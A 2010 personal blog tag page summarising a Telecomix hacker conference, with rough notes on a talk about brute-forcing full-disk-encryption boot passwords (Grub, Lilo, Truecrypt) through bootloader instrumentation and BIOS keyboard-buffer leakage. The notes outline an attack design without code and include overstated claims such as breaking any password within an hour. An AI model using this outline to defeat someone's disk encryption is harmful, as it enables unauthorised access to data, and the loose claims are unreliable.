bruteforce

...now browsing by tag

Telecomix Conference ended

Thursday, June 17th, 2010

It has been two amazing days. Even though I was late both days. I’ve enjoyed the lectures, the people and what I’ve learnt. This is definitely something I can see myself doing again, and I actually am when going to Hacknight #2 in Malmö.

Collection of lectures I attended:
Agent Felix Atari on Internt and AFK tunnels, I really liked the connection and similarities between tunnels on the internet and AFK/IRL/Meatspace. It was a really interesting lecture, and I felt that it expanded my mind a bit more.

Agent kugg on the security of pptp
Agent kugg and this subject really surprised me. I havt realized that when coming accross different protocolls you will need more than one proxy to become anonymous, but never really implemented it properly. I learnt alot and feel ready to go online in a more sneaky way.

Agent x on blackthrow, I missed most of this lecture, and Agent x wasn’t the original presenter which might have made the lecture a bit more confusing. I like the idea and thought behind the blackthrow, and I think that it can continue to become an interesting thing to work with. Especially in the educational way that chrisk described.

Agent jwalck on i2p, I missed some of this, since I was late today as well. I got a look into the interface of working with i2p which really made me less scared to go on and trying it myself. As I have been before. I’m pretty convinced that I will be putting up a i2p exitnod at my house very soon.

Agent endrazine on Zero Crypto, this lecture I was convinced would go right over my head with a woooosh sound. But it didn’t. I’m aware that my notes are messy, but he went at a quick rate which caused me to not have time to write down everything like I was supposed to. I might make it look better in a day or two when I’ve looked through the slideshow that was provided by him, through my blog.

Overall I’m really satisfied with this 0 cost 2 day conferense, and there is talk among the Telecomixers to put together a guide for how you can build one yourself.

Good luck and take care out there all hackerfriends!

Posted in Internet, Konferens | 1 Response »
Tags: blackthrow, bruteforce, conference, hacknight, i2p, pptp, telecomix, tunnels

Agent endrazine – Zero Crypto

Thursday, June 17th, 2010

Start: 14:37
What: Agent endrazine
Full disk encryption : distributed (via cloud computing) brute forcing preboot authentication passwords using x86 real mode bootloader instrumentation. This talk attempts to provide orders of magnitude regarding what is and what is not computingly breakable (and at what price !) regarding HD encryption. Featuring a heavy load of harcore 16b real mode assembly and live demos of the brute forcing of Lilo,Grub (MD5 mode) and Truecrypt. I will also cover the Bitlocker/Truecrypt plain text password leakage I previously disclosed at Defcon, briefly.
Watch it: on Bambuser

The only way to keep data secret is to encrypt it. The best way to keep it is full way full disk encryption.

Introduction

Goals of the talk is to demonstrant that there is to brute force a preboot authentication password. The ones in bios, or in bootloaders.
Give an estimation of how much it would cost in cracking on full encryption software using a generic instrumention methodology.

Cryptographic softare is mostly legalized in both North and south america and europe.
Wikipedia: In China, a license is still required to use cryptography. Many countries have tight restrictions on the use of cryptography. Among the more restrictive are laws in Belarus, Kazakhstan, Mongolia, Pakistan, Russia, Singapore, Tunisia, and Vietnam.

Cryptography from a government point of view is a superinteresting target. DES was designed to be resistant to differential cryptanalysis, a power ful and general cryptanalytic technique knwon to NSA and IBM, became publicly known when it was rediscovered in the late 1980s.
Cryptographic softwhere can be backdoored, this is a reality.

Non Tech people will say: “if it fails just go for brutefroce.
But how do you do it? There are no public tools. If you want to bruteforce it you will have to write your own operating system to brute forice it.

Keyboards internals

Endrazine gives us a Boot sequence overview, in order to further explain the full disk encryption.
CPU – > Bios EEprom – > IVT, RAM, Bootloader, Kernel.

Bios internals for keyboard management

Interaction with the keyboard, we need to understand the whole chain from the computer to the keyboard.
In your keyboard there’s a Pic, in the motherboard as well. Unified key scan codes. The data from the keyboard is stored in the bios keyboard buffer.
The password will be saved in physical memory forever.

Brute forcer design

The challanges are instalation and initial control flow modification (bios firmware, other media, mbr replacling/patching)
maintaining control (bp, ivt hijack, reroutning)
Get the source code.

Experimental Results

It is doable
The cost of hashing algorithms (md5..) is negligible in the cracking process
hashing algorithms: we tried 700 passwords in 30s. truecrypt: 10s/password (wohw!)
Time taken: Irrelevant (cloud computing)
With enough computer power you can break any given password within 1 hour.
Check the slides for more results.

Conclusion & bonus!

Bruteforcing is physically doable for both hashing algorithms and complex symetric systems
Bruteforcing remains unpratical against truecrypt so far (6 passwords / minutes, recommended pass phrases of length 20)

Not using TPM like technologies allows attackers to take advantages of distrubuted comput ing making the brute time irrelevant.

Presentation slide

Posted in Föreläsning, Internet, Konferens | 2 Responses »
Tags: algorithms, bruteforce, hashing, telecomix, truecrypt, zero crypto

Marie till Riksdagen

en segeltur tillsammans med Egil och Arwen